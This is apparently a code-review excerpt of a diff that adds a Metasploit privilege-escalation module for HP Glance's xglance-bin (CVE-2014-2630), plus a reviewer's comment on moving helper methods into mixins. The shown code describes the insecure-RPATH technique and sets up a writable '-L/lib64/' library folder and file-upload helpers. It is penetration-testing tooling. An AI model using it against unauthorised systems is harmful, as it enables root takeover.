modules/exploits/linux/local/hp_xglance_priv_esc.rb

```diff
@@ -0,0 +1,181 @@
+  include Msf::Post::Linux::Compile
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'HP Performance Monitoring xglance Priv Esc',
+        'Description'    => %q(
+            This exploit takes advantage of the fact that xglance-bin, part of
+            HP's Glance (or Performance Monitoring) version 11 'and subsequent'
+            , was compiled with an insecure
+            RPATH option that attempts to load libraries from a user controlled
+            location (-L/lib64/).  Creating libraries in this location will result
+            in an escalation of privileges to root.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die', # msf module
+            'Tim Brown', # original finding
+            'Robert Jaroszuk', # exploit
+            'Marco Ortisi', # exploit
+          ],
+        'Platform'       => [ 'linux' ],
+        'Arch'           => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'Targets'        =>
+          [
+            [ 'Automatic', { } ],
+            [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
+            [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+          ],
+        'Privileged'     => true,
+        'References'     =>
+          [
+            [ 'EDB', '48000' ],
+            [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding
+            [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit
+            [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],
+            [ 'CVE', '2014-2630' ]
+          ],
+        'DisclosureDate' => "Nov 19 2014",
+        'DefaultTarget'  => 0
+      )
+    )
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+
+  end
+
+  # Simplify pulling the writable directory variable
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def exploit_folder
+    "#{base_dir}/-L/lib64/"
+  end
+
+  # Simplify and standardize uploading a file
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+  end
+
+  # Simplify uploading and chmoding a file
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+    register_file_for_cleanup path
+  end
+
+  # Pull the exploit binary or file (.c typically) from our system
+  def exploit_data(file)
+    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)
+  end
```

Comment:
The `upload_and_chmodx` and `exploit_data` functions are now available in the `Msf::Post::File` mixins. The `upload` method can also be removed.